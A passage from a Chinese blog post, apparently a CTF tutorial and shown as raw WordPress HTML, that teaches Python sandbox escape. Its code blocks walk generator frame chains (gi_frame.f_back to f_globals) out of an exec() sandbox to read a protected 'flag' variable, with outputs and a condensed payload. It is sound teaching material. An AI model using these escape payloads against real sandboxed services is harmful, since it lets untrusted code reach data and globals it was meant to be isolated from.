style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">test<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">py<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame.f_back.f_back.f_globals&#91;&#39;flag&#39;&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u6765\u770b\u6bcf\u4e00\u6b65\u5206\u522b\u5b9e\u73b0\u4e86\u4ec0\u4e48\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame\nf = f()\nframe = next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n# &lt;frame at 0x7031974fa8c0, file 'test1', line 3, code f><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># &lt;frame at 0x7031974fa8c0, file &#39;test1&#39;, line 3, code f&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame.f_back\nf = f()\nframe = next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n# &lt;frame at 0x7ff7d792a750, file 'test1', line 6, code &lt;module>><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame.f_back<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># &lt;frame at 0x7ff7d792a750, file &#39;test1&#39;, line 6, code &lt;module&gt;&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame.f_back.f_back\nf = f()\nframe = next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n#  &lt;frame at 0x70be5c12f100, file '\/CTF\/Python\/0Test\/test.py', line 11, code &lt;module>><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame.f_back.f_back<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\">#  &lt;frame at 0x70be5c12f100, file &#39;\/CTF\/Python\/0Test\/test.py&#39;, line 11, code &lt;module&gt;&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u91cc\u5c31\u5df2\u7ecf\u5b9e\u73b0\u6c99\u7bb1\u7684\u9003\u9038\u4e86\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f\u8fd9\u79cd\u5199\u6cd5\u65e0\u6cd5\u5b9e\u73b0\u9003\u9038\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame\nf = f()\nframe = next(f)\nprint(frame.f_back)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n# None<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame.f_back)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># None<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u751f\u6210\u5668\u4e2d\u5fc5\u987b\u8981 yield \u5230 <strong>f.gi_frame.f_back<\/strong>\uff0c\u5982\u679c\u53ea\u662f yield \u5230 <strong>f.gi_frame<\/strong> \u7b2c\u4e00\u6b21 next() \u65f6\u8be5\u6808\u5e27\u5c31\u8131\u79bb\u4e86\u8c03\u7528\u6808\uff0c\u4e4b\u540e\u518d\u64cd\u4f5c\u8be5\u6808\u5e27\u5bf9\u8c61\u65f6 <strong>f_back<\/strong> \u5c31\u4e0d\u518d\u6307\u5411 exec() \u521b\u5efa\u7684\u6808\u5e27\u4e86\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u7528 <strong>for<\/strong> \u5173\u952e\u5b57\u5b9e\u73b0 next() \u51fd\u6570\u7684\u5e73\u66ff\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>payload='''\ndef f():\n \u00a0  yield f.gi_frame.f_back.f_back.f_back.f_globals&#91;'flag'&#93;\nf = f()\nf = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e next() \u4e00\u6b21\nprint(f)\n'''<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame.f_back.f_back.f_back.f_globals&#91;&#39;flag&#39;&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e next() \u4e00\u6b21<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u7cbe\u7b80\u5199\u6cd5\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>payload='''f = (f.gi_frame.f_back.f_back.f_back.f_globals&#91;'flag'&#93; for i in &#91;1&#93;)\nf = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e next() \u4e00\u6b21\nprint(f)\n'''<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><span style=\"color: #B56959\">f = (f.gi_frame.f_back.f_back.f_back.f_globals&#91;&#39;flag&#39;&#93; for i in &#91;1&#93;)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e next() \u4e00\u6b21<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"python\u4e0b\u7684Rce\u73af\u5883 object\u7c7b \u5728 python \u4e2d\uff0c\u6240\u6709\u7c7b\u7684\u9876\u5c42\u7236\u7c7b\u662f object \u7c7b\uff0c\u6240\u6709\u7c7b\u90fd\u76f4\u63a5\u6216\u95f4\u63a5\u7684\u7ee7\u627f\u4e8e object \u7c7b\u3002object \u7c7b\u4f9b\u4e86\u8bb8\u591a\u57fa\u7840\u529f\u80fd\uff0c\u4f8b\u5982 